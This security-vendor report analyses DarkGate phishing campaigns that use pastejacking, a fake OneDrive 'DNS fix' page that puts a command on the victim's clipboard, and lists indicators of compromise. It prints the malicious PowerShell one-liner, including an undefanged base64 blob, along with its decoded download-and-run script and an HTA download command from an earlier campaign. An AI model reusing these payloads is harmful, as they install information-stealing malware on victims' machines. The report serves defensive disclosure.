Vade’s Threat Intelligence and Response Center – (now part of Hornetsecurity!) recently observed a number of malicious phishing campaigns distributing Darkgate using an unusual technique called Pastejacking. DarkGate is a sophisticated and evolving malware family, first documented in 2018, and used for information stealing and remote access capabilities and known to employ advanced evasion techniques to avoid detection by antivirus software and other security measures.

In this article, we present a step-by-step breakdown of how attackers are attempting to deliver Darkgate via pastejacking based on real emails intercepted by our email security solutions.

NOTE: The below analysis contains many defanged URLs (hxxps instead of https). This is done to protect the reader from accidental clicks. It goes without saying that this documentation is provided for research purposes, and you should NOT attempt to utilize the below URLs in any way unless you’re a trained security professional. Hornetsecurity is not liable for any damage arising from the use of this information.

The Campaign

During May 27 and 28, a total of 105,640 phishing emails were sent from 17 actor controlled domains.

The emails contain brief sentences designed to create a sense of urgency or authority, urging the receiver to open the malicious attachment under the pretext of needing to review or complete a document. These sentences exhibit classic phishing techniques commonly used by threat actors.

A phishing email pretexting an unpaid bill

An HTML document named clarify_27-May\_{6 random digits}.html or Scanned_05_28-2024_\_{6 random digits}.html is attached. When opened, the page displays a fake Microsoft OneDrive folder with a loading circle, attempting to convince the victim that a PDF called “Reports.pdf” is opening.

A fake OneDrive folder loading circle

After 2 seconds, the loading GIF is hidden, and an error message appears stating that the document couldn’t be opened due to a connection error. According to the message, the DNS cache should be updated manually to fix this error.

A connection error requires the DNS cache to be updated

Due to an event listener on the document, when any part of the page is clicked outside the error box, an alert is shown with the message:

Failed to connect to the “OneDrive” cloud service.

The “Details” button redirects to the official Microsoft documentation on how to troubleshoot issues on DNS servers.

When the “How to fix” button is clicked, a new message appears.

A message explaining how to fix the DNS error

This message is prompting the victim to open a Windows terminal or PowerShell console and paste the clipboard content.

In the backend, when the button is clicked, the JJ JavaScript function is called which copies the web page’s title content, previously decoded by the atob function, to the clipboard thanks to the now-deprecated exeCommand(“copy”) method. This technique is referred as Pastejacking.

The title's content is decoded and copied to the clipboard

If an unsuspecting victim adheres to the instructions, the following commands are executed:

ipconfig /flushdns
$base64 = "JGppID0gImh0dHBzOi8va29zdHVtbjEuaWxhYnNlcnZlci5jb20vMS56aXAiOw0KJG5lID0gI mM6XFxkb3dubG9hZHMiOw0KTmV3LUl0ZW0gLUl0ZW1UeXBlIERpcmVjdG9yeSAtRm9yY2UgLVB hdGggJG5lOw0KSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkamkgLU91dEZpbGUgJG5lXHBsLnppc DsNCkNsZWFyLUhvc3Q7DQpFeHBhbmQtQXJjaGl2ZSAkbmVccGwuemlwIC1Gb3JjZSAtZGVzdGl uYXRpb25wYXRoICRuZTsNClJlbW92ZS1JdGVtIC1QYXRoICRuZVxwbC56aXA7DQpTdGFydC1Qc m9jZXNzICRuZVxBdXRvaXQzLmV4ZSAkbmVcc2NyaXB0LmEzeA0KW1N5c3RlbS5SZWZsZWN0aW9 uLkFzc2VtYmx5XTo6TG9hZFdpdGhQYXJ0aWFsTmFtZSgiU3lzdGVtLldpbmRvd3MuRm9ybXMiK TsNCltTeXN0ZW0uV2luZG93cy5Gb3Jtcy5NZXNzYWdlQm94XTo6U2hvdygiVGhlIG9wZXJhdGl vbiBjb21wbGV0ZWQgc3VjY2Vzc2Z1bGx5LCBwbGVhc2UgcmVsb2FkIHRoZSBwYWdlIiwgIlN5c 3RlbSIsIDAsIDY0KTsNCkNsZWFyLUhvc3Q7DQo="; iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64Str ing($base64))); Set-Clipboard -Value " "; exit;

The first command clears the DNS resolver cache, forcing the computer to discard any stored DNS entries and fetch new ones from the DNS server. This command doesn’t do anything malicious; it’s only here in an effort to trick the victim into thinking that the fake DNS problem is being resolved.

Next, a base64 string is decoded and executed thanks to the iex PowerShell cmdlet.

Finally, the clipboard is “cleaned” by setting its value to four spaces.

When decoded, the $base64 variable reveals a malicious PowerShell script:

$ji = "hxxps://";
$ne = "c:\\downloads";
New-Item -ItemType Directory -Force -Path $ne;
Invoke-WebRequest -Uri $ji -OutFile $ne\;
Expand-Archive $ne\ -Force -destinationpath $ne;
Remove-Item -Path $ne\;
Start-Process $ne\Autoit3.exe $ne\script.a3x
[System.Windows.Forms.MessageBox]::Show("The operation completed
successfully, please reload the page", "System", 0, 64);

When executed, this script downloads a ZIP document called from a remote server, saves it in the c:folder, unzips the content and deletes the previously downloaded ZIP. Then, to perform the infection, it runs Autoit3.exe with script.a3x as an argument.

Finally, “The operation completed successfully, please reload the page” is displayed in a message box. content

AutoIt3.exe is the executable for the AutoIt scripting language, which is designed for automating the Windows GUI and general scripting. As previously documented by researchers, DarkGate commonly uses AutoIt scripts as part of its initial infection routine.

The URL has activity attributed to the DarkGate malware

Previous Campaigns

Previous DarkGate campaigns during 2024

May 17

On May 17, a similar campaign occurred: around 43,600 mails were sent from 11 actor-controlled domains.

A Microsoft Office Word theme was used to trick the user using a similar approach.

 A Microsoft Word lure
cmd /c start /min powershell $jr = 'c:\users\public\Dp.hta';
invokewebrequest -uri hxxps:// -outfile $jr; startprocess $jr;Set-Clipboard -Value ' '; exit;

The command copied in the clipboard downloads and executes a PowerShell script from hxxps:// The script is saved in a HTA file located in c:

Malicious HTA downloaded form a remote server

This lightly obfuscated script downloads its next stage from hxxps://, a PowerShell script which downloads a ZIP from hxxp:// containing the AutoIt3 executable with its script.a3x. The script also contains a Spanish string that can be translated to “opening the Calculator”.

May 8

On May 8, around 57,500 phishing emails were sent with an attached PDF urging the victim to download a fake Java installer to access a document.

Malicious PDF inciting the victim to download a fake Java installer

May 2

On May 2, another campaign using the same Microsoft Word theme occurred: around 43,600 phishing emails were sent.


Based on the receiver’s domains, these campaigns seem to target a wide array of industries and geographic locations, reflecting a broad and opportunistic, approach, aimed at financial gain. During the May 27-28 campaigns, based on our observations, Western Europe (France, Germany and Spain) and North America (United States and Canada) were the focus. Finally, this phishing campaign targeted 75% of its efforts towards the B2B (Business-to-Business) sectors and 25% towards the B2C (Business-to-Consumer) sectors.


This research highlights how DarkGate malware continues to trend and remains active in the cybersecurity landscape. Despite ongoing efforts to combat and mitigate its impact, DarkGate has shown resilience and adaptability, maintaining its presence in various attack vectors (fake browser updates or Teams messages) and leveraging creative techniques to achieve its goals.

One of the most effective ways to defend against such threats is to provide next-gen end-user security awareness training via a trusted service like the Security Awareness Service from Hornetsecurity. In this case, with proper security training, targeted end users would be able to identify abnormal requests (like pastejacking) in potentially malicious emails. 

Indicators Of Compromise

May 27-28 Sender domains:

  • megabrightsigns[.]com
  • languangjob[.]com
  • top10nursingschools[.]com
  • rumsfeldfinance[.]com
  • quantummerchandise[.]com
  • sonicwarrior[.]org
  • scsho[.]com
  • euthanizerent[.]com
  • xpacgdh[.]com
  • welcomenymegoo[.]com
  • shawlasereye[.]com
  • bloggersua[.]com
  • ruthlesslyfests[.]com
  • shirleymallin[.]com
  • nightstarmusic[.]com
  • rumsfeldsecurity[.]com
  • nightstarmusic[.]com

May 17 Sender domains:

  • ethspark[.]com
  • exportersnet[.]com
  • languangjob[.]com
  • yerembe[.]com
  • eiqtechnology[.]com
  • wthome[.]cn
  • gwempresarial[.]com
  • udportuariosdisarp[.]com
  • automobile-locksmith[.]com
  • shanteauconsulting[.]com
  • udportuariosdisarp[.]com

May 27-28 Usernames:

  • webmaster
  • fastsupport
  • accounting
  • bill
  • contact
  • jessie
  • limited
  • noreply
  • cls
  • gpk
  • support
  • company
  • anna
  • eva
  • information
  • info
  • service
  • alan
  • admin
  • lexisnexis
  • marketing
  • energy
  • springenergy
  • manager
  • global
  • solutions
  • director
  • solutions

May 17 Usernames:

  • admin
  • support
  • no-reply
  • auto-reply
  • smacleod
  • administrator
  • office
  • usr
  • samer
  • system
  • transfer
  • user
  • office2
  • service
  • info
  • dave
  • transfer

Files SHA-256:

  • 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95dAutoIt3.exe
  • 493fb733897f4c3d7adf01d663e711e2e47240bfdf5b99abd230aa809f43a8cfscript.a3x
  • 6799222df869a6440bc3372604c36f25efc784292d74901fb2b62695f00acd67header.png
  • 4b61c21167fbe9a6573fdb6e68889fd4db180e7a8d41b9ee049ca6d54341c8f9qhsddxna
  • 9a8b0ebe7b18da6e638fdc9f7e1353c56a561419b12932aff6b0a42a7fe6ac12xcdttafq
  • 0116d3f7e5ecafaf572141a6eaf3bffa80ff04519872be77f07f4b284272db5dscript.a3x


  • hxxps://
  • hxxps://
  • hxxps://
  • hxxp://
  • hxxps://
  • hxxps://
  • hxxps://